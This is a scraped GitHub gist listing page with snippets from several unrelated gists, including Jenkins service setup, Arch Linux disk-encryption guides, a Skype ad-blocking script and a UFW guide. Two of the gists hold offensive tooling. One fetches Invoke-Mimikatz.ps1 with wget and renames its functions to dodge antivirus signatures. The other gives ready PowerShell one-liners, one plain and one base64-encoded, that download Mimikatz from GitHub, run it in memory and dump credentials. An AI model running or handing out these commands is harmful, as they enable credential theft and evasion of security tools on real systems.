Skip to content

Instantly share code, notes, and snippets.

View strasharo's full-sized avatar

strasharo

View GitHub Profile
@kyxap1
kyxap1 / nssm.jenkins.txt
Created February 24, 2021 15:29
Jenkins agent as windows service with Non-Sucking Service Manager (NSSM)
nssm install Jenkins "%COMMONPROGRAMFILES(x86)%\Oracle\Java\javapath\java.exe"
nssm set Jenkins AppParameters -jar agent.jar -jnlpUrl https://<jenksins-server-url>/computer/<jenkins-worker-node>/slave-agent.jnlp -secret <worker-secret> -workDir "C:\jenkins\"
nssm set Jenkins AppDirectory C:\Jenkins
nssm set Jenkins AppStdout C:\Jenkins\jenkins.log
nssm set Jenkins AppStderr C:\Jenkins\jenkins.log
nssm set Jenkins AppStopMethodSkip 6
nssm set Jenkins AppStopMethodConsole 1000
nssm set Jenkins AppThrottle 5000
nssm start Jenkins
@huntrar
huntrar / full-disk-encryption-arch-uefi.md
Last active May 24, 2024 19:57
Arch Linux Full-Disk Encryption Installation Guide [Encrypted Boot, UEFI, NVMe, Evil Maid]

Arch Linux Full-Disk Encryption Installation Guide

This guide provides instructions for an Arch Linux installation featuring full-disk encryption via LVM on LUKS and an encrypted boot partition (GRUB) for UEFI systems.

Following the main installation are further instructions to harden against Evil Maid attacks via UEFI Secure Boot custom key enrollment and self-signed kernel and bootloader.

Preface

You will find most of this information pulled from the Arch Wiki and other resources linked thereof.

Note: The system was installed on an NVMe SSD, substitute /dev/nvme0nX with /dev/sdX or your device as needed.

@gea0
gea0 / arch-rpi-64-full-disk-encryption-ssh-unlock.md
Last active March 24, 2024 14:36
Tutorial for installing a 64-bit Arch Linux ARM system on the Raspberry Pi 3B+, with an encrypted root filesystem, and the option to remotely unlock it via a pre-boot SSH daemon.

Arch Linux ARM 64 on Raspberry Pi 3 B+ With Full Disk Encryption And SSH Unlock: 2018 Edition

There are multiple ways to get a full disk encrypted arch linux system on raspberry. In this tutorial, we will install a 64-bit arch linux armv8 system, using dropbear as ssh server for remote pre-boot unlocking of the root filesystem. However, it will still be possible to unlock and use the pi as usual, with a keyboard and monitor. We will also create an unencrypted partition in the installation process, usable as a rescue system.

Differences to the 32-bit arch linux arm version:

  • probably better performance
  • can run 64-bit software
  • comes without the proprietary video-driver blobs
@curi0usJack
curi0usJack / minicars.sh
Last active April 26, 2021 15:48
wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1
# Uncomment below two lines to clean comments from all .ps1 files in ./
#find ./ -name "*.ps1" -exec sed -i -e '/^<#/,/^#>/d' {} \;
#find ./ -name "*.ps1" -exec sed -i -e 's/#.*$//' {} \;
sed -i -e '/^<#/,/^#>/d' Invoke-Mimikatz.ps1
sed -i -e 's/#.*$//' Invoke-Mimikatz.ps1
sed -i -e's/DumpCerts/GimmeCerts/g' Invoke-Mimikatz.ps1
sed -i -e 's/DumpCreds/GimmeCreds/g' Invoke-Mimikatz.ps1
@chrishultin
chrishultin / enable-ius-debug.yml
Last active October 20, 2018 19:25
---
- hosts: all
become: yes
tasks:
# On CentOS, epel-release is available in the default repositories. Therefore,
# ius-release can just resolve the dependency automatically. On RHEL (or other
# RHEL clones) you will need to explicitly install epel-release first. This
# task can be moved to it's own play if you want to be able to require it
@gfoss
gfoss / Quick-Mimikatz
Last active May 14, 2024 14:31
Quick Mimikatz
*NOTE - These pull from public GitHub Repos that are not under my control. Make sure you trust the content (or better yet, make your own fork) prior to using!*
#mimikatz [local]
IEX (New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/BC-SECURITY/Empire/master/empire/server/data/module_source/credentials/Invoke-Mimikatz.ps1"); Invoke-Mimikatz -Command privilege::debug; Invoke-Mimikatz -DumpCreds;
#encoded-mimikatz [local]
powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AQgBDAC0AUwBFAEMAVQBSAEkAVABZAC8ARQBtAHAAaQByAGUALwBtAGEAcwB0AGUAcgAvAGUAbQBwAGkAcgBlAC8AcwBlAHIAdgBlAHIALwBkAGEAdABhAC8AbQBvAGQAdQBsAGUAXwBzAG8AdQByAGMAZQAvAGMAcgBlAGQAZQBuAHQAaQBhAGwAcwAvAEkAbgB2AG8AawBlAC0ATQBpAG0AaQBrAGEAdAB6AC4AcABzADEAIgApADsAIABJAG4AdgBvAGsAZQAtAE0AaQBtAGkAawBhAHQAegAgAC0AQwBvAG0AbQBhAG4AZAAgAHAAcgBpAHYAaQBsAGUAZwBl
@vannmangel
vannmangel / Remove-SkypeAds.ps1
Last active January 14, 2021 11:54
Remove ads in skype
# start as admin!
# prompt for username
$SkypeUserName = Read-Host -Prompt "What is your Skype username?"
# stop skype-process
try{
if(Get-Process | ? {$_.Name -like 'skype'}) {Stop-Process -Name skype}
# commit changes to hosts file
$hostfile = "C:\Windows\System32\Drivers\etc\hosts"
@maxlapshin
maxlapshin / gist:addb1a0767a4b6c7627d
Created May 28, 2014 10:16
sofia
max$ telnet 192.168.0.112 9527
Trying 192.168.0.112...
Connected to 192.168.0.112.
Escape character is '^]'.
AVdec - PlayGetChannels(2857): enter 4 channles
AVenc - CaptureGetChannels(756): 1
AVdec - PlayGetChannels(2857): enter 4 channles
AVdec - PlayGetChannels(2857): enter 4 channles
**********************************************************************
| SYSTEM INFO
@venkateshshukla
venkateshshukla / AccessPointHotspot.sh
Last active January 25, 2021 12:35
Make a access point hotspot in Fedora
#!/bin/bash
#Initial wifi interface configuration
ifconfig wlp8s0 up 10.20.30.1 netmask 255.255.255.0
sleep 2
###########Start dnsmasq, modify if required##########
if [ -z "$(ps -e | grep dnsmasq)" ] then
dnsmasq
fi
###########
@kimus
kimus / ufw.md
Created March 2, 2014 22:46
NAT and FORWARD with Ubuntu’s ufw firewall

UFW

I use Ubuntu’s Uncomplicated firewall because it is available on Ubuntu and it's very simple.

Install UFW

if ufw is not installed by default be sure to install it first.